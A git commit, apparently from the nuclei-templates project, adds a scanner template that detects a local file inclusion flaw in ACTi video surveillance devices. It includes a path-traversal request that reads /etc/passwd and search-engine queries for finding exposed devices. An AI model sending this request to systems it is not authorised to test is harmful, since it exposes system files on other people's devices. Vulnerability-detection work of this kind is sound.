Merge pull request #7827 from projectdiscovery/acti-video-lfi

Create acti-video-lfi.yaml
patch-1
Ritik Chaddha 2023-08-07 23:40:58 +05:30 committed by GitHub
commit f42b808a8d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: acti-video-lfi
info:
name: ACTi-Video Monitoring - Local File Inclusion
author: DhiyaneshDk
severity: high
description: |
ACTI video surveillance has loopholes in reading any files
reference:
- https://www.cnblogs.com/hmesed/p/16292252.html
metadata:
max-request: 1
verified: true
fofa-query: app="ACTi-视频监控"
shodan-query: title:"Web Configurator"
tags: acti,lfi,iot,video,monitoring
http:
- method: GET
path:
- "{{BaseURL}}/images/../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200